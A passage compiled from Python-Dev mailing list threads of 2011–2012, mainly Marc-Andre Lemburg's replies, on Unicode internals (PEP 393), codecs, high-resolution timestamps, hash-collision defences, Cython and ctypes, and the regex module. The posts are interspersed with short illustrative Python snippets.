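class FrozenDict(Mapping):
    """Hypothetical read-only mapping; hashable only if all values are."""

    def __init__(self, *args, **kwargs):
        self._data = dict(*args, **kwargs)
        self._hash = None

    def __getitem__(self, key):
        return self._data[key]

    def __iter__(self):
        return iter(self._data)

    def __len__(self):
        return len(self._data)

    def __hash__(self):
        # Like tuple.__hash__: raises TypeError if any value is unhashable.
        if self._hash is None:
            self._hash = hash(frozenset(self._data.items()))
        return self._hash


meal = FrozenDict(appetizer="fried fish", main="double burger", drink="cola")
calories = {meal: 5000}

# Equal contents hash alike, regardless of insertion order.
same_meal = FrozenDict(drink="cola", main="double burger", appetizer="fried fish")
print(calories[same_meal])

# Mutable values are allowed; such an instance simply is not hashable.
with_list = FrozenDict(toppings=["cheese", "bacon"])
try:
    hash(with_list)
    hashable = True
except TypeError:
    hashable = False
print(hashable)
```

With this design the toy "meals to calories" table from the message works, while a FrozenDict holding a list can still be created and iterated, just not used as a key.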
Re: [Python-Dev] accept string in a2b and base64?
Nick Coghlan wrote:

The reason Python 2's implicit str-unicode conversions are so problematic isn't just because they're implicit: it's because they effectively assume *latin-1* as the encoding on the 8-bit str side.

The implicit conversion in Python2 only works with ASCII content, pretty much like what you describe here. Note that e.g. UTF-16 is not an ASCII super set, but the ASCII assumption still works:

    >>> u'abc'.encode('utf-16-le').decode('ascii')
    u'a\x00b\x00c\x00'

Apart from that nit (which can be resolved in most cases by disallowing 0 bytes), I still believe that the Python2 implicit conversion between Unicode and 8-bit strings is a very useful feature in practice.

-- Marc-Andre Lemburg, eGenix.com (Feb 21 2012)
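The UTF-16 nit can be reproduced in Python 3 with explicit encode/decode calls. The sketch below also shows the "disallow 0 bytes" check mentioned in the message; the helper name looks_like_ascii_text is made up for illustration.

```python
text = "abc"
utf16 = text.encode("utf-16-le")

# Every byte is below 0x80, so decoding as ASCII succeeds without error.
as_ascii = utf16.decode("ascii")
print(repr(as_ascii))


def looks_like_ascii_text(data: bytes) -> bool:
    """Reject NUL bytes in addition to non-ASCII bytes."""
    if b"\x00" in data:
        return False
    try:
        data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return True


print(looks_like_ascii_text(utf16), looks_like_ascii_text(b"abc"))
```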
Re: [Python-Dev] PEP: New timestamp formats
Nick Coghlan wrote:

On Thu, Feb 2, 2012 at 10:16 PM, Victor Stinner wrote:

Add an argument to change the result type - There should also be a description of the "set a boolean flag to request high precision output" approach.

You mean something like: time.time(hires=True)? Or time.time(decimal=True)?

Yeah, I was thinking "hires" as the short form of "high resolution", but it's a little confusing since it also parses as the word "hires" (i.e. hire+s). "hi_res", "hi_prec" (for "high precision") or "full_prec" (for "full precision") might be better.

Isn't the above (having the return type depend on an argument setting) something we generally try to avoid? I think it's better to settle on one type for high-res timers and add a new API (or APIs) for it.

-- Marc-Andre Lemburg, eGenix.com (Feb 02 2012)
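For comparison, the "separate API with one fixed return type" design can be seen in later Python versions, where time.time_ns() (Python 3.7 and newer) sits next to time.time(). The snippet is a small illustration of that design and is not something proposed in this message; the hires=True flag discussed above never existed.

```python
import time

seconds = time.time()          # always a float
nanoseconds = time.time_ns()   # always an int, no flag needed

print(type(seconds).__name__, type(nanoseconds).__name__)
```

Each function has exactly one return type, so callers never have to inspect an argument to know what they get back.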
Re: [Python-Dev] Counting collisions for the win
Frank Sievertsen wrote:

Hello, I'd still prefer to see a randomized hash()-function (at least for 3.3). But to protect against the attacks it would be sufficient to use randomization for collision resolution in dicts (and sets). What if we use a second (randomized) hash-function in case there are many collisions in ONE lookup. This hash-function is used only for collision resolution and is not cached.

This sounds a lot like what I'm referring to as "universal hash function" in the discussion on the ticket:

http://bugs.python.org/issue13703#msg150724
http://bugs.python.org/issue13703#msg150795
http://bugs.python.org/issue13703#msg151813

However, I don't like the term "random" in there. It's better to make the approach deterministic to avoid issues with not being able to easily reproduce Python application runs for debugging purposes. If you find that the data is manipulated, simply incrementing the universal hash parameter and rehashing the dict with that parameter should be enough to solve the issue (if not, which is highly unlikely, the dict will simply reapply the fix). No randomness needed.

BTW: I attached a demo script to the ticket which demonstrates both types of collisions using integers.

-- Marc-Andre Lemburg, eGenix.com (Jan 23 2012)
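The "increment the parameter and rehash" idea can be sketched with a toy chained hash table. Everything here is an assumption made for illustration: the class ToyTable, the multiplicative hash family and its constants, and the chain-length threshold are not taken from the ticket, and CPython's dict works differently (open addressing, resizing).

```python
class ToyTable:
    """Toy chained hash table with a deterministic, adjustable hash parameter."""

    PRIME = (1 << 61) - 1        # modulus of the multiplicative hash family
    STEP = 0x9E3779B97F4A7C15    # arbitrary odd constant (assumption)

    def __init__(self, nbuckets=64, max_chain=8):
        self.nbuckets = nbuckets
        self.max_chain = max_chain
        self.param = 0           # the "universal hash parameter"
        self.buckets = [[] for _ in range(nbuckets)]

    def _index(self, key):
        multiplier = (1 + self.param * self.STEP) % self.PRIME
        return (multiplier * hash(key)) % self.PRIME % self.nbuckets

    def _rehash(self):
        """Increment the parameter and redistribute; repeat if still bad."""
        items = [item for chain in self.buckets for item in chain]
        for _ in range(100):
            self.param += 1
            self.buckets = [[] for _ in range(self.nbuckets)]
            for key, value in items:
                self.buckets[self._index(key)].append((key, value))
            if max(len(chain) for chain in self.buckets) <= self.max_chain:
                return
        raise RuntimeError("table too full for this fixed-size toy")

    def set(self, key, value):
        chain = self.buckets[self._index(key)]
        for i, (existing, _) in enumerate(chain):
            if existing == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))
        if len(chain) > self.max_chain:   # too many collisions in one chain
            self._rehash()

    def get(self, key):
        for existing, value in self.buckets[self._index(key)]:
            if existing == key:
                return value
        raise KeyError(key)


table = ToyTable()
crafted = [64 * i for i in range(20)]   # all land in bucket 0 while param == 0
for i, key in enumerate(crafted):
    table.set(key, i)

longest = max(len(chain) for chain in table.buckets)
print(table.param, longest)
```

Because the parameter only ever changes in response to the data, two runs fed the same keys in the same order behave identically, which is the reproducibility property the message asks for.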
Re: [Python-Dev] Hash collision security issue (now public)
Mark Shannon wrote:

Michael Foord wrote:

Hello all, A paper (well, presentation) has been published highlighting security problems with the hashing algorithm (exploiting collisions) in many programming languages, Python included:

http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf

Although it's a security issue I'm posting it here because it is now public and seems important. The issue they report can cause (for example) handling an http post to consume horrible amounts of cpu. For Python the figures they quoted:

- reasonable-sized attack strings only for 32 bits
- Plone has max. POST size of 1 MB
- 7 minutes of CPU usage for a 1 MB request
- ~20 kbits/s → keep one Core Duo core busy

This was apparently reported to the security list, but hasn't been responded to beyond an acknowledgement on November 24th (the original report didn't make it onto the security list because it was held in a moderation queue). The same vulnerability was reported against various languages and web frameworks, and is already fixed in some of them. Their recommended fix is to randomize the hash function.

The attack relies on being able to predict the hash value for a given string. Randomising the string hash function is quite straightforward. There is no need to change the dictionary code. A possible (*untested*) patch is attached. I'll leave it for those more familiar with unicodeobject.c to do properly.

The paper mentions that several web frameworks work around this by limiting the number of parameters per GET/POST/HEAD request. This sounds like a better alternative than randomizing the hash function of strings. Uncontrollable randomization has issues when you work with multi-process setups, since the processes would each use different hash values for identical strings. Putting the base_hash value under application control could be done to solve this problem, making sure that all processes use the same random base value.
BTW: Since your randomization trick uses the current time, it would also be rather easy to tune an attack to find the currently used base_hash. To make this safe, you'd have to use a more random source for initializing the base_hash.

Note that the same hash collision attack can be used for other key types as well, e.g. integers (where it's very easy to find hash collisions), so this kind of randomization would have to be applied to other basic types too.

-- Marc-Andre Lemburg, eGenix.com (Dec 29 2011)
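Both points from this message, a seed under application control that is shared by all processes and a seed source better than the clock, can be tried with the PYTHONHASHSEED environment variable, which CPython gained after this message was written. The sketch below is an illustration under that assumption; the helper name string_hash_in_child is made up.

```python
import os
import subprocess
import sys


def string_hash_in_child(seed):
    """Return hash('python-dev') as computed by a fresh interpreter."""
    env = dict(os.environ, PYTHONHASHSEED=str(seed))
    out = subprocess.check_output(
        [sys.executable, "-c", "print(hash('python-dev'))"], env=env
    )
    return int(out)


# Seed drawn from the OS entropy pool rather than from the current time.
# PYTHONHASHSEED accepts integers from 0 to 4294967295.
shared_seed = int.from_bytes(os.urandom(4), "big")

first = string_hash_in_child(shared_seed)
second = string_hash_in_child(shared_seed)
print(first == second)
```

Worker processes started with the same seed agree on string hashes, while an attacker who cannot learn the seed cannot precompute colliding keys.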
Re: [Python-Dev] PEP 393 close to pronouncement
Victor Stinner wrote:

Given that I've been working on and maintaining the Python Unicode implementation actively or by providing assistance for almost 12 years now, I've also thought about whether it's still worth the effort.

Thanks for your huge work on Unicode, Marc-Andre!

Thanks. I enjoyed working on it, but priorities are different now, and new projects are waiting :-)

My interests have shifted somewhat into other directions and I feel that helping Python reach world domination in other ways makes me happier than fighting over Unicode standards, implementations, special cases that aren't special enough, and all those other nitty-gritty details that cause long discussions :-)

Someone said that we still need to define what a character is! By the way, what is a code point?

I'll leave that as exercise for the interested reader to find out :-) (Hint: Google should find enough hits where I've explained those things on various mailing lists and in talks I gave.)

So I feel that the PEP 393 change is a good time to draw a line and leave Unicode maintenance to Ezio, Victor, Martin, and all the others that have helped over the years. I know it's in good hands.

I don't understand why you would like to stop contribution to Unicode, but

I only have limited time available for these things and am nowadays more interested in getting others to recognize just how great Python is, than actually sitting down and writing patches for it. Unicode was my baby for quite a few years, but I now have two kids which need more love and attention :-)

well, as you want. We will try to continue your work.

Thanks.

Cheers,
-- Marc-Andre Lemburg, eGenix.com (Oct 11 2011)
Re: [Python-Dev] PEP 393 close to pronouncement
Guido van Rossum wrote:

Given the feedback so far, I am happy to pronounce PEP 393 as accepted. Martin, congratulations! Go ahead and mark it as Accepted. (But please do fix up the small nits that Victor reported in his earlier message.)

I've been working on feedback for the last few days, but I guess it's too late. Here goes anyway... I've only read the PEP and not followed the discussion due to lack of time, so if any of this is no longer valid, that's probably because the PEP wasn't updated :-)

Resizing
--------

Codecs use resizing a lot. Given that PyCompactUnicodeObject does not support resizing, most decoders will have to use PyUnicodeObject and thus not benefit from the memory footprint advantages of e.g. PyASCIIObject.

Data structure
--------------

The data structure description in the PEP appears to be wrong: PyASCIIObject has a wchar_t *wstr pointer - I guess this should be a char *str pointer, otherwise, where's the memory footprint advantage (esp. on Linux where sizeof(wchar_t) == 4)? I also don't see a reason to limit the UCS1 storage version to ASCII. Accordingly, the object should be called PyLatin1Object or PyUCS1Object.

Here's the version from the PEP:

    typedef struct {
        PyObject_HEAD
        Py_ssize_t length;
        Py_hash_t hash;
        struct {
            unsigned int interned:2;
            unsigned int kind:2;
            unsigned int compact:1;
            unsigned int ascii:1;
            unsigned int ready:1;
        } state;
        wchar_t *wstr;
    } PyASCIIObject;

    typedef struct {
        PyASCIIObject _base;
        Py_ssize_t utf8_length;
        char *utf8;
        Py_ssize_t wstr_length;
    } PyCompactUnicodeObject;

Typedef'ing Py_UNICODE to wchar_t and using wchar_t in existing code will cause problems on some systems where wchar_t is a signed type. Python assumes that Py_UNICODE is unsigned and thus doesn't check for negative values or take these into account when doing range checks or code point arithmetic. On such platforms where wchar_t is signed, it is safer to typedef Py_UNICODE to unsigned wchar_t.
Accordingly, and to prevent further breakage, Py_UNICODE should not be deprecated and should be used instead of wchar_t throughout the code.

Length information
------------------

Py_UNICODE access to the objects assumes that len(obj) == length of the Py_UNICODE buffer. The PEP suggests that length should not take surrogates into account on UCS2 platforms such as Windows. This causes len(obj) to not match len(wstr). As a result, Py_UNICODE access to the Unicode objects breaks when surrogate code points are present in the Unicode object on UCS2 platforms. The PEP also does not explain how lone surrogates will be handled with respect to the length information. Furthermore, determining len(obj) will require a loop over the data, checking for surrogate code points. A simple memcpy() is no longer enough.

I suggest to drop the idea of having len(obj) not count wstr surrogate code points to maintain backwards compatibility and allow for working with lone surrogates. Note that the whole surrogate debate does not have much to do with this PEP, since it's mainly about memory footprint savings. I'd also urge to do a reality check with respect to surrogates and non-BMP code points: in practice you only very rarely see any non-BMP code points in your data. Making all Python users pay for the needs of a tiny fraction is not really fair. Remember: practicality beats purity.

API
---

Victor already described the needed changes.

Performance
-----------

The PEP only lists a few low-level benchmarks as basis for the performance decrease. I'm missing some more adequate real-life tests, e.g. using an application framework such as Django (to the extent this is possible with Python3) or a server like the Radicale calendar server (which is available for Python3). I'd also like to see a performance comparison which specifically uses the existing Unicode APIs to create and work with Unicode objects.
Most extensions will use this way of working with the Unicode API, either because they want to support Python 2 and 3, or because the effort it takes to port to the new APIs is too high. The PEP makes some statements that this is slower, but doesn't quantify those statements.

Memory savings
--------------

The table only lists string sizes up to 8 code points. The memory savings for these are really only significant for ASCII strings on 64-bit platforms, if you use the default UCS2 Python build as basis. For larger strings, I expect the savings to be more significant. OTOH, a single non-BMP code point in such a string would cause the savings to drop significantly again.

Complexity
----------

In order to benefit from the new API, any code that has to deal with low-level Py_UNICODE access to the Unicode objects will have to be adapted. For best performance, each algorithm will have to be implemented for all three storage types. Not doing so will result in a slow-down, if I read the PEP correctly. It's difficult to say, of what scale, since that information
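The memory-savings discussion above can be checked on an interpreter that implements PEP 393 (CPython 3.3 and later). The sketch below measures how many bytes each additional character costs for the three storage widths, and what a single non-BMP code point does to an otherwise ASCII string. It relies on sys.getsizeof and on CPython's string layout, so other implementations may report different numbers; the helper name bytes_per_char is made up.

```python
import sys

samples = {
    "ASCII": "a",
    "Latin-1": "\xe9",
    "BMP": "\u20ac",
    "non-BMP": "\U0001F600",
}


def bytes_per_char(ch, n=1000):
    """Growth in object size per additional character of the same kind."""
    return (sys.getsizeof(ch * (n + 1)) - sys.getsizeof(ch)) // n


for label, ch in samples.items():
    print(label, bytes_per_char(ch))

# One non-BMP code point forces the whole string into the widest storage.
ascii_only = "a" * 1000
mixed = ascii_only + "\U0001F600"
print(sys.getsizeof(ascii_only), sys.getsizeof(mixed))
```

The last line makes the "OTOH" remark in the message concrete: appending one emoji to a 1000-character ASCII string roughly quadruples its size.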
Re: [Python-Dev] Not able to do unregister a code
Jai Sharma wrote:

Hi, I am facing a memory leak issue with codecs. I make my own ABC class and register it with codecs:

    import codecs
    codecs.register(ABC)

but I am not able to remove ABC from memory. Is there any alternative to do that?

The ABC codec search function gets added to the codec registry search path list, which currently cannot be accessed directly. There is no API to unregister a codec search function, since deregistration would break the codec cache used by the registry to speed up codec lookup. Why would you want to unregister a codec search function?

-- Marc-Andre Lemburg, eGenix.com (Sep 15 2011)
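To make the registry mechanics concrete, here is a small sketch of registering a codec search function. The codec name "toyupper" and the helper functions are made up for illustration. At the time of this message no unregister API existed; codecs.unregister() was added much later (Python 3.10), so the sketch guards its use with hasattr.

```python
import codecs


def _encode(text, errors="strict"):
    # Toy codec: upper-case the text, then encode as ASCII.
    return text.upper().encode("ascii", errors), len(text)


def _decode(data, errors="strict"):
    data = bytes(data)
    return data.decode("ascii", errors).lower(), len(data)


def toy_search(name):
    """Codec search function: return a CodecInfo or None for unknown names."""
    if name == "toyupper":
        return codecs.CodecInfo(_encode, _decode, name="toyupper")
    return None


codecs.register(toy_search)
encoded = codecs.encode("hello", "toyupper")
print(encoded)

# Only newer Python versions can remove the search function again.
if hasattr(codecs, "unregister"):
    codecs.unregister(toy_search)
```

On older versions the search function stays referenced by the registry for the lifetime of the process, which is the behaviour the original question ran into.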
Re: [Python-Dev] Ctypes and the stdlib (was Re: LZMA compression support in 3.3)
Guido van Rossum wrote: On Sun, Aug 28, 2011 at 11:23 AM, Stefan Behnel stefan...@behnel.de wrote: Hi, sorry for hooking in here with my usual Cython bias and promotion. When the question comes up what a good FFI for Python should look like, it's an obvious reaction from my part to throw Cython into the game. Terry Reedy, 28.08.2011 06:58: Dan, I once had the more or less the same opinion/question as you with regard to ctypes, but I now see at least 3 problems. 1) It seems hard to write it correctly. There are currently 47 open ctypes issues, with 9 being feature requests, leaving 38 behavior-related issues. Tom Heller has not been able to work on it since the beginning of 2010 and has formally withdrawn as maintainer. No one else that I know of has taken his place. Cython has an active set of developers and a rather large and growing user base. It certainly has lots of open issues in its bug tracker, but most of them are there because we *know* where the development needs to go, not so much because we don't know how to get there. After all, the semantics of Python and C/C++, between which Cython sits, are pretty much established. Cython compiles to C code for CPython, (hopefully soon [1]) to Python+ctypes for PyPy and (mostly [2]) C++/CLI code for IronPython, which boils down to the same build time and runtime kind of dependencies that the supported Python runtimes have anyway. It does not add dependencies on any external libraries by itself, such as the libffi in CPython's ctypes implementation. For the CPython backend, the generated code is very portable and is self-contained when compiled against the CPython runtime (plus, obviously, libraries that the user code explicitly uses). It generates efficient code for all existing CPython versions starting with Python 2.4, with several optimisations also for recent CPython versions (including the upcoming 3.3). 2) It is not trivial to use it correctly. 
Cython is basically Python, so Python developers with some C or C++ knowledge tend to get along with it quickly. I can't say yet how easy it is (or will be) to write code that is portable across independent Python implementations, but given that that field is still young, there's certainly a lot that can be done to aid this. Cython does sound attractive for cross-Python-implementation use. This is exciting. I think it needs a SWIG-like companion script that can write at least first-pass ctypes code from the .h header files. Or maybe it could/should use header info at runtime (with the .h bundled with a module). From my experience, this is a nice to have more than a requirement. It has been requested for Cython a couple of times, especially by new users, and there are a couple of scripts out there that do this to some extent. But the usual problem is that Cython users (and, similarly, ctypes users) do not want a 1:1 mapping of a library API to a Python API (there's SWIG for that), and you can't easily get more than a trivial mapping out of a script. But, yes, a one-shot generator for the necessary declarations would at least help in cases where the API to be wrapped is somewhat large. Hm, the main use that was proposed here for ctypes is to wrap existing libraries (not to create nicer APIs, that can be done in pure Python on top of this). In general, an existing library cannot be called without access to its .h files -- there are probably struct and constant definitions, platform-specific #ifdefs and #defines, and other things in there that affect the linker-level calling conventions for the functions in the library. (Just like Python's own .h files -- e.g. the extensive renaming of the Unicode APIs depending on narrow/wide build) How does Cython deal with these? I wonder if for this particular purpose SWIG isn't the better match. (If SWIG weren't universally hated, even by its original author.
:-) SIP is an alternative to SWIG: http://www.riverbankcomputing.com/software/sip/intro http://pypi.python.org/pypi/SIP and there are a few others as well: http://wiki.python.org/moin/IntegratingPythonWithOtherLanguages 3) It seems to be slower than compiled C extension wrappers. That, at least, was the discovery of someone who re-wrote pygame using ctypes. (The hope was that using ctypes would aid porting to 3.x, but the time penalty was apparently too much for time-critical code.) Cython code can be as fast as C code, and in some cases, especially when developer time is limited, even faster than hand-written C extensions. It allows for a straightforward optimisation path from regular Python code down to the speed of C, and trivial interaction with C code itself, if the need arises. Stefan [1] The PyPy port of Cython is currently being written as a GSoC project. [2] The IronPython port of Cython was written to facilitate a NumPy port to the .NET environment. It's currently not a complete port of all Cython
Re: [Python-Dev] PEP 393 review
Martin v. Löwis wrote: tl;dr: PEP-393 reduces the memory usage for strings of a very small Django app from 7.4MB to 4.4MB, all other objects taking about 1.9MB. On 26.08.2011 16:55, Guido van Rossum wrote: It would be nice if someone wrote a test to roughly verify these numbers, e.g. by allocating lots of strings of a certain size and measuring the process size before and after (being careful to adjust for the list or other data structure required to keep those objects alive). I have now written a Django application to measure the effect of PEP 393, using the debug mode (to find all strings), and sys.getsizeof: https://bitbucket.org/t0rsten/pep-393/src/ad02e1b4cad9/pep393utils/djmemprof/count/views.py The results for 3.3 and pep-393 are attached. The Django app is small in every respect: trivial ORM, very few objects (just for the sake of exercising the ORM at all), no templating, short strings. The memory snapshot is taken in the middle of a request. The tests were run on a 64-bit Linux system with 32-bit Py_UNICODE. For comparison, could you run the test of the unmodified Python 3.3 on a 16-bit Py_UNICODE version as well? Thanks, -- Marc-Andre Lemburg, eGenix.com (Aug 29 2011)
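A rough version of the check Guido describes can be sketched with sys.getsizeof alone. This assumes a CPython release that implements PEP 393 (3.3 or later); the sample characters and the length N are arbitrary choices, and the absolute numbers depend on the build, so only the relative ordering is meaningful.

```python
import sys

N = 1000  # arbitrary string length for the comparison

# One sample per storage width: pure ASCII, Latin-1, BMP, and beyond the BMP.
samples = {
    "ascii": "a" * N,
    "latin-1": "\xe9" * N,
    "bmp": "\u20ac" * N,
    "astral": "\U0001F40D" * N,
}

sizes = {name: sys.getsizeof(text) for name, text in samples.items()}

for name, size in sizes.items():
    print(f"{name:8} {size:6} bytes, {size / N:.2f} bytes per character")
```

Measuring process size, as suggested in the thread, would additionally capture allocator overhead that sys.getsizeof does not report.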
Re: [Python-Dev] PEP 393 Summer of Code Project
Stefan Behnel wrote: Isaac Morland, 26.08.2011 04:28: On Thu, 25 Aug 2011, Guido van Rossum wrote: I'm not sure what should happen with UTF-8 when it (in flagrant violation of the standard, I presume) contains two separately-encoded surrogates forming a valid surrogate pair; probably whatever the UTF-8 codec does on a wide build today should be good enough. Similarly for encoding to UTF-8 on a wide build if one managed to create a string containing a surrogate pair. Basically, I'm for a garbage-in-garbage-out approach (with separate library functions to detect garbage if the app is worried about it). If it's called UTF-8, there is no decision to be taken as to decoder behaviour - any byte sequence not permitted by the Unicode standard must result in an error (although, of course, *how* the error is to be reported could legitimately be the subject of endless discussion). There are security implications to violating the standard so this isn't just legalistic purity. Hmmm, doesn't look good:
Python 2.6.1 (r261:67515, Jun 24 2010, 21:47:49)
[GCC 4.2.1 (Apple Inc. build 5646)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> '\xed\xb0\x80'.decode ('utf-8')
u'\udc00'
Incorrect! Although this is a narrow build - I can't say what the wide build would do. Works the same for me in a wide Py2.7 build, but gives me this in Py3:
Python 3.1.2 (r312:79147, Sep 27 2010, 09:57:50)
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> b'\xed\xb0\x80'.decode ('utf-8')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-2: illegal encoding
Same for current Py3.3 and the PEP393 build (although both have a better exception message now: UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-1: invalid continuation byte).
The reason for this is that the UTF-8 codec in Python 2.x has never rejected lone surrogates and it was used to store Unicode literals in pyc files (using marshal) and also by pickle for transferring Unicode strings, so we could not simply reject lone surrogates, since this would have caused compatibility problems. That change was made in Python 3.x by having a special error handler surrogatepass which allows the UTF-8 codec to process lone surrogates as well. BTW: I'd love to join the discussion about PEP 393, but unfortunately I'm swamped with work, so these are just a few comments... What I'm missing in the discussion is statistics of the effects of the patch (both memory and performance) and the effect on 3rd party extensions. I'm not convinced that the memory/speed tradeoff is worth the breakage or whether the patch actually saves memory in real world applications and I'm unsure whether the needed code changes to the binary Python Unicode API can be done in a minor Python release. Note that in the worst case, a PEP 393 Unicode object will save three versions of the same string, e.g. on Windows with sizeof(wchar_t)==2: A UCS4 version in str, a UTF-8 version in utf8 (this gets built whenever Python needs a UTF-8 version of the object) and a wchar_t version in wstr (which gets built whenever Python codecs or extensions need Py_UNICODE or a wchar_t representation). On all platforms, in the case where you store a Latin-1 non-ASCII string: str holds the Latin-1 string, utf8 the UTF-8 version and wstr the 2- or 4-byte wchar_t version. * A note on terminology: Python stores Unicode as code points. A Unicode code point refers to any value in the Unicode code range which is 0 - 0x10FFFF. Lone surrogates, unassigned and illegal code points are all still code points - this is a detail people often forget.
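The distinction between what a Python string may hold and what the codec accepts can be shown in a few lines. This is a minimal Python 3 sketch; the byte sequence is the same one used in the interpreter sessions quoted earlier in this thread, and surrogatepass is the standard error handler named above.

```python
lone = "\udc00"  # a lone low surrogate: a code point, but not encodable in strict UTF-8

# The string object itself stores the code point without complaint.
assert len(lone) == 1 and ord(lone) == 0xDC00

# The strict UTF-8 codec refuses to encode it...
try:
    lone.encode("utf-8")
    encode_failed = False
except UnicodeEncodeError:
    encode_failed = True

# ...unless the surrogatepass error handler is requested explicitly.
raw = lone.encode("utf-8", "surrogatepass")

# Decoding follows the same rule: strict fails, surrogatepass round-trips.
try:
    raw.decode("utf-8")
    strict_decode_ok = True
except UnicodeDecodeError:
    strict_decode_ok = False

roundtrip = raw.decode("utf-8", "surrogatepass")
print(encode_failed, raw, strict_decode_ok, roundtrip == lone)
```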
Various code points in Unicode have special meanings and some are not allowed to be used in encodings, but that does not rule them out from being stored and processed as code points. Code units are only used in encoded versions of Unicode, e.g. UTF-8, -16, -32. Mixing code units and code points can cause much confusion, so it's better to talk only about code points when referring to Python Unicode objects, since you only ever meet code units when looking at the bytes output of the codecs. This is important to know, since Python is not only meant to process Unicode, but also to build Unicode strings, so a careful distinction has to be made when considering what is correct and what not: codecs have to follow much more strict rules than Python itself. * A note on surrogates: These are just one particular problem where you run into the situation where splitting a Unicode string potentially breaks a combination of code points. There are a few other types of code points that cause similar problems, e.g. combining code points. Simply going with UCS-4 does not solve the problem, since even with UCS-4 storage, you can still have surrogates in your Python Unicode string. As with many things, it is important
Re: [Python-Dev] Should we move to replace re with regex?
Guido van Rossum wrote: I just made a pass of all the Unicode-related bugs filed by Tom Christiansen, and found that in several, the response was "this is fixed in the regex module" [by Matthew Barnett]. I started replying that I thought that we should fix the bugs in the re module (i.e., really in _sre.c) but on second thought I wonder if maybe regex is mature enough to replace re in Python 3.3. It would mean that we won't fix any of these bugs in earlier Python versions, but I could live with that. However, I don't know much about regex -- how compatible is it, how fast is it (including extreme cases where the backtracking goes crazy), how bug-free is it, and so on. Plus, how much work would it be to actually incorporate it into CPython as a complete drop-in replacement of the re package (such that nobody needs to change their imports or the flags they pass to the re module). We'd also probably have to train some core developers to be familiar enough with the code to maintain and evolve it -- I assume we can't just volunteer Matthew to do so forever... :-) What's the alternative? Is adding the requested bug fixes and new features to _sre.c really that hard? Why not simply add the new lib, see whether it works out and then decide which path to follow. We've done that with the old regex lib. It took a few years and releases to have people port their applications to the then new re module and syntax, but in the end it worked. With a new regex library there are likely going to be quite a few subtle differences between re and regex - even if it's just doing things in a more Unicode compatible way. I don't think anyone can actually list all the differences given the complex nature of regular expressions, so people will likely need a few years and releases to get used to it before a switch can be made. -- Marc-Andre Lemburg, eGenix.com (Aug 27 2011)
Re: [Python-Dev] Should we move to replace re with regex?
Guido van Rossum wrote: On Fri, Aug 26, 2011 at 3:09 PM, M.-A. Lemburg m...@egenix.com wrote: Guido van Rossum wrote: I just made a pass of all the Unicode-related bugs filed by Tom Christiansen, and found that in several, the response was "this is fixed in the regex module" [by Matthew Barnett]. I started replying that I thought that we should fix the bugs in the re module (i.e., really in _sre.c) but on second thought I wonder if maybe regex is mature enough to replace re in Python 3.3. It would mean that we won't fix any of these bugs in earlier Python versions, but I could live with that. However, I don't know much about regex -- how compatible is it, how fast is it (including extreme cases where the backtracking goes crazy), how bug-free is it, and so on. Plus, how much work would it be to actually incorporate it into CPython as a complete drop-in replacement of the re package (such that nobody needs to change their imports or the flags they pass to the re module). We'd also probably have to train some core developers to be familiar enough with the code to maintain and evolve it -- I assume we can't just volunteer Matthew to do so forever... :-) What's the alternative? Is adding the requested bug fixes and new features to _sre.c really that hard? Why not simply add the new lib, see whether it works out and then decide which path to follow. We've done that with the old regex lib. It took a few years and releases to have people port their applications to the then new re module and syntax, but in the end it worked. With a new regex library there are likely going to be quite a few subtle differences between re and regex - even if it's just doing things in a more Unicode compatible way. I don't think anyone can actually list all the differences given the complex nature of regular expressions, so people will likely need a few years and releases to get used to it before a switch can be made. I can't say I liked how that transition was handled last time around.
I really don't want to have to tell people "Oh, that bug is fixed but you have to use regex instead of re" and then a few years later have to tell them "Oh, we're deprecating regex, you should just use re." No, you tell them: "If you want Unicode 6 semantics, use regex, if you're fine with Unicode 2.0/3.0 semantics, use re." After all, it's not like re suddenly stopped working :-) I'm really hoping someone has more actual technical understanding of re vs. regex and can give us some facts about the differences, rather than, frankly, FUD. The good part is that it's based on the re code, the FUD comes from the fact that the new lib is 380kB larger than the old one and that's not even counting the generated 500kB of lookup tables. If no one steps up to do a review or analysis, I think the only practical way to test the lib is to give it a prominent chance to prove itself. The other aspect is maintenance. Perhaps we could have a summer of code student do a review and analysis to get familiar with the code and then have at least two developers know the code well enough to support it for a while. -- Marc-Andre Lemburg, eGenix.com (Aug 27 2011)
Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)
Victor Stinner wrote: On 28/07/2011 11:28, Victor Stinner wrote: Please do keep the original implementation around (e.g. renamed to codecs.open_stream()), though, so that it's still possible to get easy-to-use access to codec StreamReader/Writers. I will add your alternative to the PEP (unless you would like to do that yourself?). If I understood correctly, you propose to: * rename codecs.open() to codecs.open_stream() * change codecs.open() to reuse open() (and so io.TextIOWrapper) (and don't deprecate anything) I added your proposal to the PEP as an Alternative Approach. Thanks. -- Marc-Andre Lemburg, eGenix.com (Jul 29 2011)
Re: [Python-Dev] Status of the PEP 400? (deprecate codecs.StreamReader/StreamWriter)
Victor Stinner wrote: Hi, Three weeks ago, I posted a draft of my PEP on this mailing list. I tried to include all remarks you made, and the PEP is now online: http://www.python.org/dev/peps/pep-0400/ It's now unclear to me if the PEP will be accepted or rejected. I don't know what to do to move forward. The PEP still compares apples and oranges, issues and features, and doesn't cover the fact that it is proposing to not just deprecate a feature, but a part of a design concept which will then no longer be available in Python. I'm still -1 on that part of the PEP. As I mentioned before, having codecs.open() changed to be a wrapper around io.open() in Python 3.3 should be investigated. If it doesn't cause too much trouble, this would be a good idea. Please do keep the original implementation around (e.g. renamed to codecs.open_stream()), though, so that it's still possible to get easy-to-use access to codec StreamReader/Writers. Thanks, -- Marc-Andre Lemburg, eGenix.com (Jul 28 2011)
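The two stream designs under discussion can be placed side by side with in-memory streams. This is a small sketch using only codecs.getreader() and io.TextIOWrapper; the sample bytes are made up, and the example deliberately avoids codecs.open() and the proposed codecs.open_stream(), which is only a suggested name in this thread.

```python
import codecs
import io

data = "caf\u00e9\r\nbar\r\n".encode("utf-8")

# Codec-centric design (PEP 100): ask the codec for its StreamReader class
# and wrap the byte stream with it.
stream_reader = codecs.getreader("utf-8")(io.BytesIO(data))
via_codec = stream_reader.read()

# Stream-centric design (io module): one generic wrapper, codec chosen by name.
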